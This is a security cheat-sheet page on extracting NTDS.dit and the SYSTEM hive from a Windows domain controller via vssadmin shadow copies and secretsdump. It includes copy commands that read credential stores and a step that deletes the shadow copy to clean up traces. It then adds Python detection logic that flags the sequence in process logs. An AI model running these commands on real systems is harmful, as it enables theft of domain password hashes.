Volume Shadow Copy
Volume Shadow Copy (VSS) is a feature in Windows that allows for the creation of snapshots, or shadow copies, of files and volumes on a Windows system. These snapshots can be used for backup and recovery purposes and provide a point-in-time copy of files, including the NTDS.dit database.
Use the built-in command-line tool vssadmin to obtain backups of NTDS.dit and the SYSTEM file containing the Boot Key required to decrypt NTDS.dit.
Exploit
secretsdump.py [domain/]username[:password]@<target> <options> -use-vss
OPTIONS
- `-just-dc` Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
- `-just-dc-ntlm` Extract Only NTDS.dit Data (NTLM Only)
- `-just-dc-user [username]` Extract Only NTDS.dit Data For Specified User
- `-user-status` Display If The User Is Disabled
- `-history` Dump Password History
- `-outputfile` Base Output Filename
- `-hashes` Authenticate Using LMHASH:NTHASH
- `-k` Use Kerberos Auth From ccache File

## Create A Shadow Copy Of The C Drive
vssadmin create shadow /for=C:
## Copy The NTDS.dit And SYSTEM Hive From The Shadow Copy To Be Exfiltrated
copy [ShadowCopyName]\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
copy [ShadowCopyName]\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save
## Delete The Shadow Copy We Created To Clean Up A Bit
vssadmin delete shadows /shadow=[ShadowCopyID]

## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -ntds ntds.dit.save -system system.save LOCAL
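The sequence above leaves a recognisable trail in process-creation telemetry (Security event 4688 or Sysmon event 1, with command-line logging enabled). The following Python is an added detection example, not code from the original page: it matches each stage against constructed sample records and alerts only when a shadow copy creation is followed, for the same host and user, by a read of NTDS.dit from the shadow path. The record field names, the 600 second window and the sample values are assumptions.

```python
import re
from datetime import datetime

# Constructed sample process-creation records (Security 4688 / Sysmon Event 1 style),
# reduced to the fields the logic needs. Not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:01", "host": "DC01", "user": "CORP\\svc-backup",
     "cmdline": r"vssadmin create shadow /for=C:"},
    {"ts": "2024-01-01T10:00:09", "host": "DC01", "user": "CORP\\svc-backup",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save"},
    {"ts": "2024-01-01T10:00:12", "host": "DC01", "user": "CORP\\svc-backup",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save"},
    {"ts": "2024-01-01T10:00:30", "host": "DC01", "user": "CORP\\svc-backup",
     "cmdline": r"vssadmin delete shadows /shadow={00000000-0000-0000-0000-000000000000}"},
    {"ts": "2024-01-01T11:00:00", "host": "FS01", "user": "CORP\\admin",
     "cmdline": r"vssadmin list shadows"},  # benign: listing shadows is routine admin work
]

# One case-insensitive pattern per stage of the procedure described on the page.
STAGES = {
    "create": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_copy": re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\NTDS\\ntds\.dit", re.I),
    "system_copy": re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\System32\\Config\\SYSTEM", re.I),
    "delete": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
}

def match_stages(cmdline):
    """Return the set of stage names whose pattern appears in one command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}

def correlate(events, window_seconds=600):
    """Alert per (host, user) when a shadow copy is created and NTDS.dit is read from it
    within the window; a lone 'create' is ignored because scheduled backups produce it."""
    by_actor = {}
    for ev in events:
        stages = match_stages(ev["cmdline"])
        if stages:
            by_actor.setdefault((ev["host"], ev["user"]), []).append((ev["ts"], stages))
    alerts = []
    for (host, user), hits in by_actor.items():
        hits.sort(key=lambda h: h[0])  # order by timestamp, window starts at the first hit
        t0 = datetime.fromisoformat(hits[0][0])
        seen = set()
        for ts, stages in hits:
            if (datetime.fromisoformat(ts) - t0).total_seconds() <= window_seconds:
                seen |= stages
        if {"create", "ntds_copy"} <= seen:  # deleting the copy afterwards is an anti-forensics signal
            alerts.append({"host": host, "user": user, "stages": seen,
                           "severity": "high" if "delete" in seen else "medium"})
    return alerts
```

Because `vssadmin create shadow` alone is routine on hosts with backup software, the rule keys on the combination with a read of NTDS.dit, which no legitimate backup agent performs via `copy` from the shadow device path.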